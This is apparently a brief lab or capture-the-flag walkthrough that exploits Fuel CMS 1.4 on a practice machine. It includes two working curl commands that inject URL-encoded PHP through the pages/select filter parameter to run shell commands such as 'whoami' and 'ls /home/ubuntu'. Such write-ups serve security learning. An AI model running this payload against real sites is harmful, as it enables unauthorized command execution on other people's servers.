Let’s Boot up the machine
now let’s start Nmap Scan
By Nmap Scan we discovered PORT 22 and 80 is running so let’s visit website running on port 80
by visiting the website we discovered it running FULE CMS (Content management system) with its version number so let’s search it (Fuel CMS 1.4) on exploit-db for available exploit
the main thing we need is the above payload Let’s craft payload to run whoami command with available exploit
curl -g -s “10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27”| sed -n ‘47,500p’ | tr “>” “\n” | grep -vE “<p|</p|h4|<div|br|</div” | awk NF | tail -n 60 | sed ‘s/^system$/ /g’ | sort -u
for getting the flag we need to replace whoami with different command with URL encoded we can use this website CyberChef to encode command in URL encoded
Let’s list /home/ubuntu directory to list content
command ls /home/ubuntu
url encoded ls%20/home/ubuntu
replace whoami with ls%20/home/ubuntu
curl -g -s “10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%20/home/ubuntu%27%29%2b%27”| sed -n ‘47,500p’ | tr “>” “\n” | grep -vE “<p|</p|h4|<div|br|</div” | awk NF | tail -n 60 | sed ‘s/^system$/ /g’ | sort -u
with similar steps now cat the flag to read the content of it
Thank you so much for reading, Happy hacking, and happy learning!!